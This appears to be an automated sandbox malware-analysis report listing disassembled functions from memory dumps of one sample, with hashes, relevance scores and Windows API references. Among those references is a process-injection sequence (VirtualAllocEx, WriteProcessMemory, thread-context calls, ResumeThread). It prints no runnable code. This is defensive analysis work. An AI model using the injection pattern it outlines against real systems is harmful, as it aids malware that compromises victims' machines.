Opcode Fuzzy Hash: 5dd2fd9235aa98fe8e05caccff302658636b26216ca4f810dc89fbdb7af45be5
Instruction Fuzzy Hash: 05417BB0D1520ADFCB14CFEAD8415EEFBB1FF9A300F00982AD511B6214E7784A598FA4

Function 075ED5F0 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2130509221.00000000075E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_75e0000_Kh7W85ONS7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b21d6a658bcc73c6d7eb4b4e2d7a3114fa235fc9251acf979801272bbb713b74
Instruction ID: 5a94276842c5964188f3bb2ac7b8c45f2f0953323038dc70709970237c3beabd
Opcode Fuzzy Hash: b21d6a658bcc73c6d7eb4b4e2d7a3114fa235fc9251acf979801272bbb713b74
Instruction Fuzzy Hash: 3B3138B1E006188BEB18CFAAD8443DEBBF7AFC9310F14C16AD418A6294DB750A49CF50

Function 07522E52 Relevance: 2.6, Strings: 2, Instructions: 101
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

;@, xrefs: 07522EAC
@, xrefs: 07522E94

Memory Dump Source

Source File: 00000000.00000002.2130367257.0000000007520000.00000040.00000800.00020000.00000000.sdmp, Offset: 07520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7520000_Kh7W85ONS7.jbxd

Similarity

API ID:
String ID: ;@$@
API String ID: 0-1513858037
Opcode ID: 4bd8d21ecefe93d74608baf2bdc56652f6b5555e7cb1be61fdece7857987ec34
Instruction ID: c4617dcc1d1cf027b9f9ce6e87342b7f7d88ecca9903a01fd02bbe856cce40b7
Opcode Fuzzy Hash: 4bd8d21ecefe93d74608baf2bdc56652f6b5555e7cb1be61fdece7857987ec34
Instruction Fuzzy Hash: F731AC6154E7D16FC303977848606D6BFB0EF47110B0E86DBD1DACB0E3E628484AC366

Function 0752D2A8 Relevance: 2.1, Strings: 1, Instructions: 897
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

@, xrefs: 0752D75C

Memory Dump Source

Source File: 00000000.00000002.2130367257.0000000007520000.00000040.00000800.00020000.00000000.sdmp, Offset: 07520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7520000_Kh7W85ONS7.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 1ab1bfa70085a9e4aea10982a9f2f912a7ef6af3ca8657a8cf03810cc3964e30
Instruction ID: 7a787ea72c8a79d6566f218e0bf84a01beae880bbb725c1d420b491896a92096
Opcode Fuzzy Hash: 1ab1bfa70085a9e4aea10982a9f2f912a7ef6af3ca8657a8cf03810cc3964e30
Instruction Fuzzy Hash: 0162AE70E24218CFCB14BFB8E58A69DBBB5FB89300F0048A9E445E7394DE399846DB51

Function 0752D7A5 Relevance: 1.8, Strings: 1, Instructions: 512
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

@, xrefs: 0752D75C

Memory Dump Source

Source File: 00000000.00000002.2130367257.0000000007520000.00000040.00000800.00020000.00000000.sdmp, Offset: 07520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7520000_Kh7W85ONS7.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 1611073c6edf72c75fed2d3a486e1aa703c2de115c2ecbf49373e19bcf89627e
Instruction ID: a47d849c8672c778074fb5732f63b3611b290bee774554e1647640974d0b167f
Opcode Fuzzy Hash: 1611073c6edf72c75fed2d3a486e1aa703c2de115c2ecbf49373e19bcf89627e
Instruction Fuzzy Hash: B712A174E28258CFC725AF74D89A69D7FB1FB4A300F0048AAE485EB385DB394C46DB51

Function 05E62410 Relevance: 1.7, APIs: 1, Instructions: 157
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05E625A2

Memory Dump Source

Source File: 00000000.00000002.2129115495.0000000005E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e60000_Kh7W85ONS7.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 1c027f07e3557e1fef4e7bc8feaecf69f20994846525f927c73dfc82c9f2dde2
Instruction ID: e8314874be392c1b44e9f59663a78e5396300f18b09276fd60f2c7abfd1d711b
Opcode Fuzzy Hash: 1c027f07e3557e1fef4e7bc8feaecf69f20994846525f927c73dfc82c9f2dde2
Instruction Fuzzy Hash: DA511FB5C00249AFDF11CFA9C894ADDBFB2FF48340F14812AE958AB220D731A845DF51

Function 05E61240 Relevance: 1.6, APIs: 1, Instructions: 116
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05E625A2

Memory Dump Source

Source File: 00000000.00000002.2129115495.0000000005E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e60000_Kh7W85ONS7.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: cb6b06ee47c16926b7eda6a5bf1fe03dee7d62d4d3e96d818ec790f579eea618
Instruction ID: 4e9fad406fd9395e41569557c16be1d8c4df16327cd7df421d7f728ca71f73c7
Opcode Fuzzy Hash: cb6b06ee47c16926b7eda6a5bf1fe03dee7d62d4d3e96d818ec790f579eea618
Instruction Fuzzy Hash: 0351E1B5C00309DFDF24CF99C884ADEBBB6BF48354F64812AE959AB210D7719841CF91

Function 05E61394 Relevance: 1.6, APIs: 1, Instructions: 97
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 05E64B11

Memory Dump Source

Source File: 00000000.00000002.2129115495.0000000005E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e60000_Kh7W85ONS7.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: 959a73e6095a53bc9a9aac604e6d2ac591d2012f71bad88dd3041ba15a26645d
Instruction ID: d9640a92d52608fbf4c26273fe5fc4b51b3965a2ab4814615c9c584dcf71fa11
Opcode Fuzzy Hash: 959a73e6095a53bc9a9aac604e6d2ac591d2012f71bad88dd3041ba15a26645d
Instruction Fuzzy Hash: 884167B8A00304DFDB04CF99C488BAABBF6FF88354F24C449E519A7361D775A841CBA4

Function 075EB7E1 Relevance: 1.6, APIs: 1, Instructions: 77
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNEL32(?,?,?,?), ref: 075EB87B

Memory Dump Source

Source File: 00000000.00000002.2130509221.00000000075E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_75e0000_Kh7W85ONS7.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 8d6a12133be50d139589ad37d7f97960ec56de93b90b77c5f167a982a68cba84
Instruction ID: 46e91f09af80e0f0c6c2f88c067f3e56a74943ce67af2eceb646fa3d873e5605
Opcode Fuzzy Hash: 8d6a12133be50d139589ad37d7f97960ec56de93b90b77c5f167a982a68cba84
Instruction Fuzzy Hash: 3A2139B29042499FCB10DFAAD844BDEFBF4EB49320F10842AE558A7601D378A545CBA1

Function 075DD370 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 075DD400

Memory Dump Source

Source File: 00000000.00000002.2130463015.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_75d0000_Kh7W85ONS7.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 01368135883f84d630f7fcca7f543546ed64a3b006007e161195a25ca23ff9ba
Instruction ID: 2c14705dbc5cb806516972bdcc135a5452dfc3bde34b4f6880dd31aa1ea39d2a
Opcode Fuzzy Hash: 01368135883f84d630f7fcca7f543546ed64a3b006007e161195a25ca23ff9ba
Instruction Fuzzy Hash: 43212AB19003099FDB10CFAAC885BDEBBF5FF48310F10842AE519A7240D7789944CBA4

Function 075DC928 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64GetThreadContext.KERNEL32(?,00000000), ref: 075DC9A6

Memory Dump Source

Source File: 00000000.00000002.2130463015.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_75d0000_Kh7W85ONS7.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 8ababbcbd94e1d7a9013010ce381eacfc0a89056f68ecd747dbbec50553c46dd
Instruction ID: 65df369fb168279bb35ed3612ba27b2563f2e5e5fb1f91a4eab0233398c84845
Opcode Fuzzy Hash: 8ababbcbd94e1d7a9013010ce381eacfc0a89056f68ecd747dbbec50553c46dd
Instruction Fuzzy Hash: 722135B19003098FDB10CFAAC8857EEBBF5BF88210F14842AD459A7240DB78A945CFA5

Function 075DDAF0 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 075DDB6E

Memory Dump Source

Source File: 00000000.00000002.2130463015.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_75d0000_Kh7W85ONS7.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 39315b5b457c1bf2dc0371e4e2691b52c4bd26837d09386d08f207d9b8461099
Instruction ID: 2b49ca3b11f6c9470ae47afe70cf5bf280b95954fe6fd989de77f8acf4cb50b5
Opcode Fuzzy Hash: 39315b5b457c1bf2dc0371e4e2691b52c4bd26837d09386d08f207d9b8461099
Instruction Fuzzy Hash: 7C2129B19003099FEB10CFAAC4857EEBBF4FF48214F14842AD559A7240DB789945CFA5

Function 075DD868 Relevance: 1.6, APIs: 1, Instructions: 60COMMON

Download Yara Rule

APIs

VirtualProtectEx.KERNEL32(?,?,?,?,?), ref: 075DD8DF

Memory Dump Source

Source File: 00000000.00000002.2130463015.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_75d0000_Kh7W85ONS7.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 13a4f56380198d301371bd0962ef7f44b15b937106beb89638930e1e27893c2b
Instruction ID: 80f0ac1e7efb6fe6388599d4d2b1a529be67a651bc341484a5c9fa2a0b3f26fe
Opcode Fuzzy Hash: 13a4f56380198d301371bd0962ef7f44b15b937106beb89638930e1e27893c2b
Instruction Fuzzy Hash: C52138718003099FDB10CFAAC844BEEBBF4FF48310F10842AE519A7240DB799901DFA1

Function 060952A0 Relevance: 1.6, APIs: 1, Instructions: 59COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNEL32(00000000), ref: 0609D4F0

Memory Dump Source

Source File: 00000000.00000002.2129428057.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6090000_Kh7W85ONS7.jbxd

Similarity

API ID: LongNamePath
String ID:
API String ID: 82841172-0
Opcode ID: f49b0a1b541dfdb06a62b64377eab0b0efa72a5bc9a34244a807709355f51bde
Instruction ID: 34570025df16e29ccca4b00380b6a487571a3e3c6a94fa8be70d7e07dc60eb5c
Opcode Fuzzy Hash: f49b0a1b541dfdb06a62b64377eab0b0efa72a5bc9a34244a807709355f51bde
Instruction Fuzzy Hash: 212138B5C046599BDB14CF9AC444BAEFBF4FF48310F10816AD819A7640D778A944CFE5

Function 075D3982 Relevance: 1.6, APIs: 1, Instructions: 58memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,?,?,?), ref: 075D39FB

Memory Dump Source

Source File: 00000000.00000002.2130463015.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_75d0000_Kh7W85ONS7.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: f42a4ad235664007da1435eefa9f8a93eb4fd3a9244de87f7d75469c43237e14
Instruction ID: 66fe02a360aeb998215e6364e49eff821eba21e817db0bb77a57d89031815987
Opcode Fuzzy Hash: f42a4ad235664007da1435eefa9f8a93eb4fd3a9244de87f7d75469c43237e14
Instruction Fuzzy Hash: 2A2108B59042499FDB10CF9AC884BDEFBF4FF48310F10842AE968A7251D374A945CFA1

Function 075EB808 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,?,?,?), ref: 075EB87B

Memory Dump Source

Source File: 00000000.00000002.2130509221.00000000075E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_75e0000_Kh7W85ONS7.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: f9f0ff50de1cad82845f15cab9d92e783d00c7733a6f52af3871cbaa41620f88
Instruction ID: 8812beab039f2cbc5105ca5bf00a3d771974d6709883b84de6e515edb18d3a59
Opcode Fuzzy Hash: f9f0ff50de1cad82845f15cab9d92e783d00c7733a6f52af3871cbaa41620f88
Instruction Fuzzy Hash: 2321E7B59042499FDB10CF9AC884BDEFBF4FB48310F10842AE568A7650D374A544CFA5

Function 075D3988 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,?,?,?), ref: 075D39FB

Memory Dump Source

Source File: 00000000.00000002.2130463015.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_75d0000_Kh7W85ONS7.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: abb1013619e431cdd2ee0121193f07074d2f37899d68c51cc27ba6f572d164ba
Instruction ID: 68f5e3f358b6076e6672e10e90d5ea79e7bc90ed84f4d2f5bfa25709e40835f2
Opcode Fuzzy Hash: abb1013619e431cdd2ee0121193f07074d2f37899d68c51cc27ba6f572d164ba
Instruction Fuzzy Hash: 4B21E7B5900249DFDB10CF9AC884BDEFBF4FB48310F10842AE568A7650D774A944CFA5

Function 075DCFF8 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 075DD066

Memory Dump Source

Source File: 00000000.00000002.2130463015.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_75d0000_Kh7W85ONS7.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: c5cc581e281430acc071bc9c2b93ecd7078af2e65b86eb13b79c89fca7a6642c
Instruction ID: 439bbd6162398bab750f1c623d9fc674f8c123c17c741f6afdfba66ee0627cff
Opcode Fuzzy Hash: c5cc581e281430acc071bc9c2b93ecd7078af2e65b86eb13b79c89fca7a6642c
Instruction Fuzzy Hash: B11137729003499FDB20DFAAC844BDFBBF5EF88310F14881AE519A7250D7769945CFA4

Function 077B0AA8 Relevance: 1.5, APIs: 1, Instructions: 49COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNEL32(?), ref: 077B0B08

Memory Dump Source

Source File: 00000000.00000002.2130683838.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_77b0000_Kh7W85ONS7.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 040da2f60404db7893c9558b7d4e39925b1bf04a06d8843b4b828a53689e06b3
Instruction ID: 60553d8552dbc2f7d0c40de2cf9972140e38a86338b80608f0c7aad0790ebfeb
Opcode Fuzzy Hash: 040da2f60404db7893c9558b7d4e39925b1bf04a06d8843b4b828a53689e06b3
Instruction Fuzzy Hash: 9B116AB18003498FDB20CFAAC445BEFBBF5EF48320F10881AD459A7240D738A549CFA4

Function 075DDD78 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNEL32 ref: 075DDDDA

Memory Dump Source

Source File: 00000000.00000002.2130463015.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_75d0000_Kh7W85ONS7.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 8350ac111313e69d50b8523ef73966f8da33bc30972b112b64c36463c04a7fa4
Instruction ID: dc093ca7a3ad8d76fb4c7de233a36b7ea1f2bd0f1c2e80c9c0391a8af87d8b47
Opcode Fuzzy Hash: 8350ac111313e69d50b8523ef73966f8da33bc30972b112b64c36463c04a7fa4
Instruction Fuzzy Hash: B8113AB19003498FDB20DFAAC8457EFFBF4EF88214F14881AD519A7640CB75A945CBA4

Function 077B0AB0 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNEL32(?), ref: 077B0B08

Memory Dump Source

Source File: 00000000.00000002.2130683838.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_77b0000_Kh7W85ONS7.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 453533b3ffb7949515d488f1e4f5da0c8aba7d03b8aa2ed217b62357df2c6502
Instruction ID: 61749c5867ae625c952177ca1d795ad1093b31f9e4697349edb0db5d62f04528
Opcode Fuzzy Hash: 453533b3ffb7949515d488f1e4f5da0c8aba7d03b8aa2ed217b62357df2c6502
Instruction Fuzzy Hash: 9E1115B58003498FDB20CF9AC845BDEBBF4EF48324F10881AD569A7740D778A544CFA5

Function 075DB968 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 075DE3C5

Memory Dump Source

Source File: 00000000.00000002.2130463015.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_75d0000_Kh7W85ONS7.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: ff5d2fe4fa558f8a1700124e0f44a7951856b1ac046042360ddfb78bfcc58af8
Instruction ID: 49742a5e94a8c82788a1a2480d8135b8cafc55d2e0493ba461d037bada9f38ea
Opcode Fuzzy Hash: ff5d2fe4fa558f8a1700124e0f44a7951856b1ac046042360ddfb78bfcc58af8
Instruction Fuzzy Hash: DF11F8B58043499FDB20CF9AD845BEEBBF4FB48714F10881AE519A7600D3B5A944CFA1

Function 06073948 Relevance: .8, Instructions: 784COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2129350714.0000000006070000.00000040.00000800.00020000.00000000.sdmp, Offset: 06070000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6070000_Kh7W85ONS7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b1408e12128d8dc3121401e22639da673333ef0dcc10f61a18f060294e41a03
Instruction ID: ef3ce1b61081b79e0ad26ce23b6bcb02c0020e39de0baee8a16c1f9246b3d484
Opcode Fuzzy Hash: 1b1408e12128d8dc3121401e22639da673333ef0dcc10f61a18f060294e41a03
Instruction Fuzzy Hash: 66620D70E84B858ADBF49F74D4883AE7FE1AB45340F104D1FD1EACA291EB74A441BB49

Function 02B28938 Relevance: .8, Instructions: 782COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2120735008.0000000002B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2b20000_Kh7W85ONS7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7cf96aa761dfe09d6dd64f21d4aff20abb9c30657a85c2a3fbfd072affa5ff0e
Instruction ID: f14522b7d9ad45d2cd8db4129867b56b1122d9829f4578a09fced019f03aac34
Opcode Fuzzy Hash: 7cf96aa761dfe09d6dd64f21d4aff20abb9c30657a85c2a3fbfd072affa5ff0e
Instruction Fuzzy Hash: 7F621E70A003188FEF15DBA4C964BDEBBB2EF88300F5081A9D50A6B3A5DF355E459F51

Function 0752E218 Relevance: .6, Instructions: 600COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2130367257.0000000007520000.00000040.00000800.00020000.00000000.sdmp, Offset: 07520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7520000_Kh7W85ONS7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3b351e18e3ef4386e905a34ef3c91fec55b6515f88482b48bc9ffcaecc3d02a
Instruction ID: 3eec8ea3fb374c642f74b98c181b6612c28a414ce5b26c146901a4e8abe9b1d9
Opcode Fuzzy Hash: c3b351e18e3ef4386e905a34ef3c91fec55b6515f88482b48bc9ffcaecc3d02a
Instruction Fuzzy Hash: 34122430B14241CFD705FBB8D99A66E7BB2FF86200F45486AD085E7296DE3D9C06D362

Function 02B2E900 Relevance: .6, Instructions: 574COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2120735008.0000000002B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2b20000_Kh7W85ONS7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f1f046d0dab5e791dc26b3f6219c926dbe1f7ea347278d50fff7e8059fbe4b64
Instruction ID: 51c060ead1595c161bc68a0eb1f3495d16e276e7acd08585ba7f1032e80b5140
Opcode Fuzzy Hash: f1f046d0dab5e791dc26b3f6219c926dbe1f7ea347278d50fff7e8059fbe4b64
Instruction Fuzzy Hash: 4622C070A003199FDB15DF69C884AAEBBF6FF89300F1485AAE409EB351D735E949CB50

Function 07523169 Relevance: .6, Instructions: 566COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2130367257.0000000007520000.00000040.00000800.00020000.00000000.sdmp, Offset: 07520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7520000_Kh7W85ONS7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a64594377ede68c01ef2a02a7fe31987a639e3490c2f0edafb871faf97bd558a
Instruction ID: 11369d25acdb003f6dca1e88e460216ec4023093142e473e65b62662f43a534f
Opcode Fuzzy Hash: a64594377ede68c01ef2a02a7fe31987a639e3490c2f0edafb871faf97bd558a
Instruction Fuzzy Hash: 47229F70B10214CBCB54FFB8D9897ADBBB6BB88300F908469D489E7394DE399C49DB51

Function 07523178 Relevance: .6, Instructions: 561COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2130367257.0000000007520000.00000040.00000800.00020000.00000000.sdmp, Offset: 07520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7520000_Kh7W85ONS7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 62f3f5144509516053256d11b74b144942d75d5a4b773bd8359d336f550e29d6
Instruction ID: bff728da1091ed4a300a48d28ce66e15cc68da246f32bb40e289b6386eb8495f
Opcode Fuzzy Hash: 62f3f5144509516053256d11b74b144942d75d5a4b773bd8359d336f550e29d6
Instruction Fuzzy Hash: B8128E70B10214CBCB54FFB8D98976DBBB6BB88300F808469D489E7394DE399C49DB51

Function 06073988 Relevance: .5, Instructions: 454COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2129350714.0000000006070000.00000040.00000800.00020000.00000000.sdmp, Offset: 06070000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6070000_Kh7W85ONS7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a681b8d5753ed667ebaa45617b6b7fde5453b2ac858c5eeacb4b9233801a8e57
Instruction ID: 6f1d28e0ea772f1752cdc9b8970eae6b23ff3389a11b6787a5f7d594356eacf7
Opcode Fuzzy Hash: a681b8d5753ed667ebaa45617b6b7fde5453b2ac858c5eeacb4b9233801a8e57
Instruction Fuzzy Hash: 9F123EB0D89B824ADBF49F64C58439F7BD0AB05350F204D5BC0FAC9256E735A086FB49

Function 02B27870 Relevance: .4, Instructions: 447COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2120735008.0000000002B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2b20000_Kh7W85ONS7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4131998c4798c257054a9c22bf6e5ccb061e850e414b7f9d16af6d00233922c2
Instruction ID: 450b64d98ad9fed561a1816dd51b2f4a8301ac06024e207dd614ed8cfcb253dc
Opcode Fuzzy Hash: 4131998c4798c257054a9c22bf6e5ccb061e850e414b7f9d16af6d00233922c2
Instruction Fuzzy Hash: 78125A30A003199FDB24DF69C884AAEFBF2FF88714F148599E4499B2A1DB30ED45DB54

Function 02B27DF8 Relevance: .4, Instructions: 435COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2120735008.0000000002B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2b20000_Kh7W85ONS7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da651a28f292808df41ca7e7299026472b67db807eafcc914fbd03e4c0778ff7
Instruction ID: a247cd02ef0bff7b2bb0d24b339cd2faaa249b48dbafbce6b99e21ae6c343a21
Opcode Fuzzy Hash: da651a28f292808df41ca7e7299026472b67db807eafcc914fbd03e4c0778ff7
Instruction Fuzzy Hash: F5024D31A00625DFCB14CF68C684AAEBBF2FF88314F15C994E5099B295D734EC85CBA5

Function 075228E0 Relevance: .4, Instructions: 434COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2130367257.0000000007520000.00000040.00000800.00020000.00000000.sdmp, Offset: 07520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7520000_Kh7W85ONS7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0094d43c8afc1564813e450e0670e706d2a6269d1320381d13e6b17cacb57f11
Instruction ID: 973b062a5f71e7c2b3ac90a4ec1f088a8a53b2465917cfbfb1e5864d002ea891
Opcode Fuzzy Hash: 0094d43c8afc1564813e450e0670e706d2a6269d1320381d13e6b17cacb57f11
Instruction Fuzzy Hash: C5E11270B14214CFCB05BBB8D8956BEBBB6BFC9240F41486DD085E7391DE398C0AA361

Function 0607BF33 Relevance: .4, Instructions: 410COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2129350714.0000000006070000.00000040.00000800.00020000.00000000.sdmp, Offset: 06070000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6070000_Kh7W85ONS7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 47046512a2904df5ea05332b3977abcfe564919d60af677b70d94241a7571fd5
Instruction ID: e33a182eb94dc1e57ead3a47cbd0dec0c17492cca3054c77cf6e9964c839b433
Opcode Fuzzy Hash: 47046512a2904df5ea05332b3977abcfe564919d60af677b70d94241a7571fd5
Instruction Fuzzy Hash: 7602F734A40205DFDB84DF68D498AAD7BF2BF89714F5581A8E409DB362CB31EC86CB54

Function 0752CB56 Relevance: .4, Instructions: 393COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2130367257.0000000007520000.00000040.00000800.00020000.00000000.sdmp, Offset: 07520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7520000_Kh7W85ONS7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1ea8ebed145f8d2f9fec570e34794047c3f9ef94b38c19d8c0de68a0850d55b2
Instruction ID: 183dd0686f2d8d720e760bfb6c1cdb2d64c4b5a9fea1e34b238843201df428e7
Opcode Fuzzy Hash: 1ea8ebed145f8d2f9fec570e34794047c3f9ef94b38c19d8c0de68a0850d55b2
Instruction Fuzzy Hash: EFD11670B04351CFCB05ABB8D8996AC7FB1FF86200F4545AAD085DB2A2DB3D9C0AD761

Function 02B26000 Relevance: .4, Instructions: 369COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2120735008.0000000002B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B20000, based on PE: false

Joe Sandbox IDA Plugin

